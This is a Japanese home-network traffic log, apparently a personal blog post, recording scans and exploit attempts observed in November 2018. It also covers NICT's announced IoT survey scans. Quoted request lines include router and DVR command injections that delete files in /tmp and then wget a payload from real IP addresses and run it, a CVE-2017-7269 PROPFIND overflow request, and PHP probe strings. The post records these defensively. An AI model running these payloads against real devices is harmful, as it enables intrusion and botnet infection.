通信解析2
以下から変化した内容を。
■脆弱性検知
・Netbios null session
NetBIOS Enumeration And Null Sessionxtraweb.wordpress.com
・LinkSys E-series ルータの脆弱性
うちには"http://xxx//tmUnblock.cgi" のアクセスがきました。
That new Linksys worm... : netsec
・Huawei Router HG532 - Arbitrary Command Execution
うちには”POST /ctrlt/DeviceUpgrade_1 HTTP/1.1”のアクセスがきました。
・Netgear DGN の脆弱性
うちには
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://68.183.28.29/cock+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
こちらがきました。
Bugtraq: Unauthenticated command execution on Netgear DGN devices
・CVE-2017-5638 (これは中国から大量に)
・CVE-2017-10271/CVE-2017-3506
ハニーポット観察記録(38)「WebLogic の WLS Security に対するコマンド実行の試み(CVE-2017-10271)」 at www.morihi-soc.net
・Multiple CCTV-DVR Vendors - Remote Code Execution
我が家にはこちらが。
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://209.141.50.26/b;sh${IFS}/tmp/bm&>r&&tar${IFS}/string.js HTTP/1.0
・CVE-2017-7269
うちにはこちらが。
PROPFIND / HTTP/1.1
Host: localhost
Connection: Close
Content-Length: 0
If: <http://localhost/aaaaaaa........................................................................................................................................................................................................................................................................................................................................................................................................................................> (Not <locktoken:write1>) <http://localhost/bbbbbbb.............................................................................................................................................................................................................................................................................................................................................................................................
続きは明日以降で。
NICTさんからアクセス頂いておりました。2
18日に設定変更の諸々をやっているので、前後で少し違う見え方かも。
時間 | 元 | 先 | 元ポート | 先ポート |
2018/11/22 23:01 | 210.150.186.238 | xx | 40282 | 23 |
2018/11/22 21:57 | 210.150.186.238 | xx | 40282 | 5555 |
2018/11/22 9:12 | 210.150.186.238 | xx | 40282 | 52869 |
2018/11/22 8:23 | 210.150.186.238 | xx | 40282 | 8080 |
2018/11/22 8:04 | 210.150.186.238 | xx | 40282 | 22 |
2018/11/21 8:15 | 210.150.186.238 | xx | 40282 | 23023 |
2018/11/21 7:24 | 210.150.186.238 | xx | 40282 | 80 |
2018/11/20 18:56 | 210.150.186.238 | xx | 40282 | 8000 |
2018/11/19 17:11 | 210.150.186.238 | xx | 42093 | 23 |
2018/11/19 16:58 | 210.150.186.238 | xx | 42093 | 80 |
2018/11/19 13:35 | 210.150.186.238 | xx | 42093 | 22 |
2018/11/16 19:56 | 210.150.186.238 | xx | 46885 | 22 |
2018/11/16 17:00 | 210.150.186.238 | xx | 46973 | 80 |
2018/11/16 0:59 | 210.150.186.238 | xx | 41626 | 80 |
2018/11/15 21:18 | 210.150.186.238 | xx | 41626 | 23 |
以下は少し調べた内容。
・宛先ポート:23
・宛先ポート:5555
・宛先ポート:52869
・宛先ポート:23023
・宛先ポート:8000
NICTさんからアクセス頂いておりました。
すっかり忘れてました。
以下の記事から。
日本国内でインターネットに接続されたIoT機器等に関する事前調査の実施について | NICT-情報通信研究機構
抜粋~~~~~
- 〇事前調査の概要
- 〇事前調査の実施時期
- 11月14日(水) に開始し、来年1月末までを目途に実施予定です。
- ○事前調査に使用するIPアドレス
- 以下のIPアドレスから実施します。
- 210.150.186.238 、122.1.4.87、 122.1.4.88
- ~~~~
- 以下我が家へ。
-
時間 元 先 元ポート 先ポート 2018/11/16 19:56 210.150.186.238 xx 46885 22 2018/11/16 17:00 210.150.186.238 xx 46973 80 2018/11/16 0:59 210.150.186.238 xx 41626 80 2018/11/15 21:18 210.150.186.238 xx 41626 23
通信解析 / 11月17日
昨日から今日昼までにあった自宅グローバル宛の通信について、まとめてみました。
何かのご参考になれば幸いです。
■不明なTCP通信 4件
宛先ポート:9339(送信元はUS)>通信中身はただの不明な文字列のみ
■不明なUDP通信 41件
宛先ポート:16403
宛先ポート:161
宛先ポート:443
宛先ポート:54155
>すべて通信中身はただの不明な文字列のみ。(送信元はUS、China)
■脆弱性検知
・SIPVicious を探していると思われる通信。27件
https://ja.osdn.net/projects/freshmeat_sipvicious/
*SIPアプリケーションで、宛先ポート:5060、5090、11010、20001,6550、4010、65476など宛の通信。
・Netis / Netcoreの脆弱性をつく攻撃。35件
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
・RPC Portmapper DUMPリクエスト。3件
■Web的な話。
・HTTPのHostヘッダがドメインじゃなくIPアドレスな通信 561件
*実際のグローバルIPもあれば関係ないグローバルIPが入っているケースも。
・wp-cron.phpへのアクセス。40件
Wordpressのcron機能で利用するページ。
http://www.webdesignleaves.com/wp/wordpress/432/
・adminページへのダイレクトアクセス。5件
・CONNECTメソッドでアクセス。1件。
・発行したセッションCookieを無視してアクセスしてきた。1件。
*セッションハイジャックを狙ってるのかな。。
・phpMyAdmin関連。40件
phpMyAdmin,phpMyAdmion,phpMyAdmin++,phpMyAdmin__,phpMyAdmin-oldなど
*phpMyAdminだと設定でブロックされてるから、別パスでアクセスしてる?
・POST使ってphpページにいろんなデータを投げ込む。320件
*val=die(@md5(Ch3ck1ng)),admin=die(@md5(Ch3ck1ng))などなどのログが多数。
https://curiousprog.com/2018/10/03/a-wordpress-die-md5-exploit/
・ /m.php?pbid=open が2件。
こちらにも同じ形跡が。何を狙ってるんだろう。。
https://sec-owl.hatenablog.com/entry/2018/08/16/004324
・ /cmd.phpが6件。
・ /shell.phpが6件。
*これはコマンドインジェクション狙いかな。
・HTTPメソッドがPROPFIND
http://d.hatena.ne.jp/marmotte/20100106
・ /lala.phpが2件。
wafなどがお気に召さないご様子。malicousなのか?